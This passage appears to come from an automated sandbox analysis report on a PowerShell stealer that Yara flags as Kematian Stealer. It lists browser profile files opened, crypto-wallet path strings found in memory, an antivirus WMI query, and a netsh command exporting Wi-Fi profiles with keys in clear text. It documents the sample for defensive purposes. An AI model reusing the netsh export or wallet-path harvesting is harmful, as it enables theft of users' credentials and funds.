            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\TempState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\RoamingState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\INetHistory VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Symbols VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Kematian Stealer
            Source: Yara matchFile source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Electrum" = Join-Path $env:appdata "\Electrum\wallets"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "com.liberty.jaxx" = Join-Path $env:appdata "\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Exodus" = Join-Path $env:appdata "\Exodus\exodus.wallet"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Exodus" = Join-Path $env:appdata "\Exodus\exodus.wallet"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
